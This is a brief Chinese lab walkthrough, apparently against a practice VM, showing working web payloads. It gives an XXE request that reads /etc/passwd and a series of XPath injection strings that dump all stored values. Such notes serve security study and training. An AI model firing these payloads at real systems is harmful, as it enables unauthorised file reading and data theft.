example1:
http://192.168.91.139/xml/example1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20UserInfo%5B%3C%21ENTITY%20name%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Caa%3E%26name%3B%3C%2faa%3E
http://192.168.91.139/xml/example1.php?xml=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE UserInfo[<!ENTITY name SYSTEM "file:///etc/passwd">]><aa>&name;</aa>
读取passwd文件内容
example2:
http://192.168.91.139/xml/example2.php?name=hacker' 加单引号报错
http://192.168.91.139/xml/example2.php?name=hacker'or '1'='1 得到两个name值
http://192.168.91.139/xml/example2.php?name=hacker'or 1=1]/parent::*/child::node()%00 得到所有值
关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。
